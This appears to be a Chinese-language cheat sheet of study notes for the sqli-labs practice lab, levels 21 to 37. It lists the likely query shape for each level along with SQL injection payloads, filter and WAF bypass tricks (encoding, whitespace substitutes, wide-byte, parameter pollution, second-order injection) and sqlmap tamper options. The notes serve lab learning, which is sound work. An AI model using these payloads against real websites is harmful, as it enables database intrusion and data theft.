sqli-labs(advanced)
(base64加密)
Less-21:
select * from table where cookie=('cookie');
admin') and sleep(5)#>>YWRtaW4nKSBhbmQgc2xlZXAoNSkj
sqlmap --tamper base64encode.py
Less-22:
select * from table where cookie="cookie";
admin" and sleep(5)#>>YWRtaW4iIGFuZCBzbGVlcCg1KSM=
(#,--过滤)
Less-23:
select * from table where id='1';
1' and 1='1
(更改用户密码)
Less-24:
update table set password='test' where username='admin' and password='admin';
创建用户admin'#
用admin'#修改密码
(and,or过滤)
Less-25:
select * from table where id='1';
大小写
双写
hex,urlencode编码
添加注释
&&,||
sqlmap --hex
Less-25a:
select * from table where id=1;
(空格,注释过滤)
Less-26:
select * from table where id='1';
%09,%0b TAB
%0a 新建一行
%0c 新建一页
%0d return
%a0 空格
1'||'1构造闭合
Less-26a:
select * from table where id=('1');
and(sleep(5))||('1
Less-27:
select * from table where id='1';
Less-27a:
select * from table where id="1";
Less-28:
select * from table where id=('1');
Less-28a:
select * from table where id=('1');
如果没有回显用不同编码多试几下
sqlmap --tamper randomcase.py space2randomblank.py
(WAF)
Less-29:
select * form table where id='1';
?id=1&id=2' and 1=1%23
Less-30:
select * from table where id="1";
sqlmap --skip-waf
Less-31:
select * from table where id=("1");
(宽字节)
Less-32:
select * from table where id='1';
%df' and 1=1%23
sqlmap --tamper=unmagicquotes.py
Less-33:
select * from table where id='1';
Less-34:
select * from table where username='admin' and password='admin';
Less-35:
select * from table where id=1;
and 1=1%23
Less-36:
select * from table where id='1';
Less-37:
select * from table where username='admin' and password='admin';